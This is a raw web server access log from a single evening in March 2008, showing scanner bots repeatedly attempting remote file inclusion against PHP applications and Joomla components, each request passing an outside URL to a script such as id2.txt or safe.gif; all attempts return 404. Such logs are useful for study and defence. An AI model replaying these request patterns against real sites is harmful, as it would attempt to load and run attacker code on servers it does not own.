72.29.64.142 - - [30/Mar/2008:20:18:03 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.75.39 - - [30/Mar/2008:20:19:11 -0700] "GET /logs/access_080107.log/send_reminders.php?includedir=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
140.113.4.81 - - [30/Mar/2008:20:20:25 -0700] "GET /logs/access_071210.log//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
140.113.4.81 - - [30/Mar/2008:20:20:26 -0700] "GET //txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
140.113.4.81 - - [30/Mar/2008:20:20:26 -0700] "GET /logs//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
140.113.4.81 - - [30/Mar/2008:20:22:07 -0700] "GET /logs/access_080128.log//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:22:15 -0700] "GET /logs/access_080225.log//ashnews.php?pathtoashnews=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:22:16 -0700] "GET /logs/access_080225.log//ashnews.php?pathtoashnews=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
61.241.88.28 - - [30/Mar/2008:20:22:53 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.241.88.28 - - [30/Mar/2008:20:22:56 -0700] "GET //ashnews.php?pathtoashnews=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
89.149.195.135 - - [30/Mar/2008:20:24:50 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.toulouseangloexchange.com"
72.29.64.142 - - [30/Mar/2008:20:26:00 -0700] "GET /logs/access_071231.log/send_reminders.php?includedir=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.64.142 - - [30/Mar/2008:20:26:00 -0700] "GET /logs/access_071231.log/send_reminders.php?includedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.64.142 - - [30/Mar/2008:20:26:00 -0700] "GET /logs/send_reminders.php?includedir=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.64.142 - - [30/Mar/2008:20:26:01 -0700] "GET /logs/send_reminders.php?includedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
61.241.88.28 - - [30/Mar/2008:20:26:01 -0700] "GET /logs//atom.php5?page=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
80.249.116.11 - - [30/Mar/2008:20:29:47 -0700] "GET /logs/access_080204.log//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.249.116.11 - - [30/Mar/2008:20:29:47 -0700] "GET /logs/access_080204.log//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.249.116.11 - - [30/Mar/2008:20:29:47 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.249.116.11 - - [30/Mar/2008:20:29:47 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.249.116.11 - - [30/Mar/2008:20:29:47 -0700] "GET /logs//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.249.116.11 - - [30/Mar/2008:20:29:47 -0700] "GET /logs//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.249.116.11 - - [30/Mar/2008:20:31:24 -0700] "GET /logs/access_080121.log//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.249.116.11 - - [30/Mar/2008:20:31:24 -0700] "GET /logs/access_080121.log//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.163.232 - - [30/Mar/2008:20:31:40 -0700] "GET /logs/access_071210.log//oneadmin/photogallery/include.php?path[docroot]=http://www.capecoral-golf.com/tsys/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.163.232 - - [30/Mar/2008:20:31:41 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.capecoral-golf.com/tsys/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.163.232 - - [30/Mar/2008:20:31:41 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.capecoral-golf.com/tsys/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:32:21 -0700] "GET /logs/access_071210.log//oneadmin/photogallery/include.php?path[docroot]=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:32:21 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:32:21 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:33:15 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:33:15 -0700] "GET //ashnews.php?pathtoashnews=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:33:15 -0700] "GET /logs//ashnews.php?pathtoashnews=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
59.106.75.43 - - [30/Mar/2008:20:33:48 -0700] "GET /logs/access_080225.log//ashnews.php?pathtoashnews=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
87.106.163.232 - - [30/Mar/2008:20:33:49 -0700] "GET /logs/access_080114.log//oneadmin/photogallery/include.php?path[docroot]=http://www.capecoral-golf.com/tsys/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:20:33:51 -0700] "GET /logs/access_080128.log/index.php?visualizar=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:20:33:51 -0700] "GET /index.php?visualizar=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:20:33:51 -0700] "GET /logs/index.php?visualizar=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:20:33:51 -0700] "GET /logs/access_080204.log/index.php?visualizar=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.29.75.39 - - [30/Mar/2008:20:33:57 -0700] "GET /logs/access_080211.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.75.39 - - [30/Mar/2008:20:33:57 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:34:00 -0700] "GET /logs/access_080114.log//oneadmin/photogallery/include.php?path[docroot]=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
62.50.14.189 - - [30/Mar/2008:20:34:07 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
62.50.14.189 - - [30/Mar/2008:20:34:08 -0700] "GET //inc/header.php/step_one.php?server_inc=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:20:34:15 -0700] "GET /logs/access_080211.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:20:34:15 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:20:34:15 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.25.137.24 - - [30/Mar/2008:20:34:31 -0700] "GET /logs/access_071119.log//com_articles.php?absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.25.137.24 - - [30/Mar/2008:20:34:31 -0700] "GET //com_articles.php?absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.25.137.24 - - [30/Mar/2008:20:34:32 -0700] "GET /logs//com_articles.php?absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.29.64.142 - - [30/Mar/2008:20:35:19 -0700] "GET /logs/access_080107.log/send_reminders.php?includedir=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.64.142 - - [30/Mar/2008:20:35:19 -0700] "GET /logs/access_080107.log/send_reminders.php?includedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
201.122.44.247 - - [30/Mar/2008:20:35:25 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.toulouseangloexchange.com"
201.122.44.247 - - [30/Mar/2008:20:35:26 -0700] "GET //inc/header.php/step_one.php?server_inc=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.toulouseangloexchange.com"
59.106.75.43 - - [30/Mar/2008:20:36:35 -0700] "GET /logs/access_080211.log/index.php?page=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
59.106.75.43 - - [30/Mar/2008:20:36:35 -0700] "GET /index.php?page=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
59.106.75.43 - - [30/Mar/2008:20:36:36 -0700] "GET /logs/index.php?page=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
221.143.48.95 - - [30/Mar/2008:20:36:36 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
221.143.48.95 - - [30/Mar/2008:20:36:37 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
85.25.137.24 - - [30/Mar/2008:20:37:44 -0700] "GET /logs/access_080128.log/administrator/components/com_jreactions/langset.php?comPath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.25.137.24 - - [30/Mar/2008:20:37:44 -0700] "GET /administrator/components/com_jreactions/langset.php?comPath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.25.137.24 - - [30/Mar/2008:20:37:45 -0700] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
59.106.75.43 - - [30/Mar/2008:20:38:13 -0700] "GET /logs/access_080128.log/administrator/components/com_jreactions/langset.php?comPath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
59.106.75.43 - - [30/Mar/2008:20:38:13 -0700] "GET /administrator/components/com_jreactions/langset.php?comPath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
59.106.75.43 - - [30/Mar/2008:20:38:14 -0700] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
205.234.213.67 - - [30/Mar/2008:20:38:22 -0700] "GET //joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.52.2.130 - - [30/Mar/2008:20:38:41 -0700] "GET /index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
221.236.9.134 - - [30/Mar/2008:20:39:47 -0700] "GET /logs/include/html/config.php?DIR=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.toulouseangloexchange.com"
80.249.116.11 - - [30/Mar/2008:20:40:33 -0700] "GET /logs/access_080211.log/admin/admin.php?set=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.249.116.11 - - [30/Mar/2008:20:40:33 -0700] "GET /logs/access_080211.log/admin/admin.php?set=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.249.116.11 - - [30/Mar/2008:20:40:34 -0700] "GET /admin/admin.php?set=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.249.116.11 - - [30/Mar/2008:20:40:34 -0700] "GET /admin/admin.php?set=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.249.116.11 - - [30/Mar/2008:20:40:34 -0700] "GET /logs/admin/admin.php?set=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.249.116.11 - - [30/Mar/2008:20:40:34 -0700] "GET /logs/admin/admin.php?set=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:20:40:41 -0700] "GET /logs/access_080211.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:20:40:41 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:20:40:41 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.68.45.40 - - [30/Mar/2008:20:40:58 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.toulouseangloexchange.com"
58.68.45.40 - - [30/Mar/2008:20:41:04 -0700] "GET //inc/header.php/step_one.php?server_inc=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.toulouseangloexchange.com"
200.89.198.133 - - [30/Mar/2008:20:42:43 -0700] "GET /logs/access_080128.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:20:42:48 -0700] "GET /logs/access_080127.log//login.php?dir=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:20:42:49 -0700] "GET //login.php?dir=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:20:42:49 -0700] "GET /logs//login.php?dir=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
221.236.9.134 - - [30/Mar/2008:20:42:51 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.toulouseangloexchange.com"
200.89.198.133 - - [30/Mar/2008:20:42:56 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.29.75.39 - - [30/Mar/2008:20:43:15 -0700] "GET /logs/access_080128.log/index.php?visualizar=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.75.39 - - [30/Mar/2008:20:43:15 -0700] "GET /logs/index.php?visualizar=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.75.39 - - [30/Mar/2008:20:43:15 -0700] "GET /logs/access_080204.log/index.php?visualizar=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
62.50.14.189 - - [30/Mar/2008:20:43:42 -0700] "GET /logs//displayCategory.php?basepath=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
62.50.14.189 - - [30/Mar/2008:20:43:43 -0700] "GET //displayCategory.php?basepath=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:20:44:06 -0700] "GET /logs/access_071119.log//login.php?dir=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
201.122.44.247 - - [30/Mar/2008:20:44:18 -0700] "GET /logs//displayCategory.php?basepath=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.toulouseangloexchange.com"
201.122.44.247 - - [30/Mar/2008:20:44:19 -0700] "GET //displayCategory.php?basepath=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.toulouseangloexchange.com"
85.25.137.24 - - [30/Mar/2008:20:44:41 -0700] "GET /logs/access_071119.log/administrator/components/com_jreactions/langset.php?comPath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.249.116.11 - - [30/Mar/2008:20:44:45 -0700] "GET /logs/access_080128.log/admin/admin.php?set=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.249.116.11 - - [30/Mar/2008:20:44:45 -0700] "GET /logs/access_080128.log/admin/admin.php?set=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
205.234.213.67 - - [30/Mar/2008:20:45:05 -0700] "GET /logs/access_080303.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
205.234.213.67 - - [30/Mar/2008:20:45:05 -0700] "GET /logs//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
205.234.213.67 - - [30/Mar/2008:20:45:11 -0700] "GET /logs/access_080127.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:45:22 -0700] "GET /logs/access_080114.log//components/com_simpleboard/image_upload.php?sbp=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:45:22 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:45:22 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:45:22 -0700] "GET /logs/access_080127.log//components/com_simpleboard/image_upload.php?sbp=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
87.106.163.232 - - [30/Mar/2008:20:46:54 -0700] "GET /logs/access_080114.log//components/com_simpleboard/image_upload.php?sbp=http://www.capecoral-golf.com/tsys/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.163.232 - - [30/Mar/2008:20:46:54 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.capecoral-golf.com/tsys/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.163.232 - - [30/Mar/2008:20:46:55 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.capecoral-golf.com/tsys/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.163.232 - - [30/Mar/2008:20:46:55 -0700] "GET /logs/access_080127.log//components/com_simpleboard/image_upload.php?sbp=http://www.capecoral-golf.com/tsys/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
210.114.174.160 - - [30/Mar/2008:20:47:30 -0700] "GET /logs/access_080128.log//akocomments.php?mosConfig_absolute_path=http://www.italianiamonaco.com/components/com_loudmouth/includes/abbc/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:47:31 -0700] "GET /logs/access_080225.log//ashnews.php?pathtoashnews=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
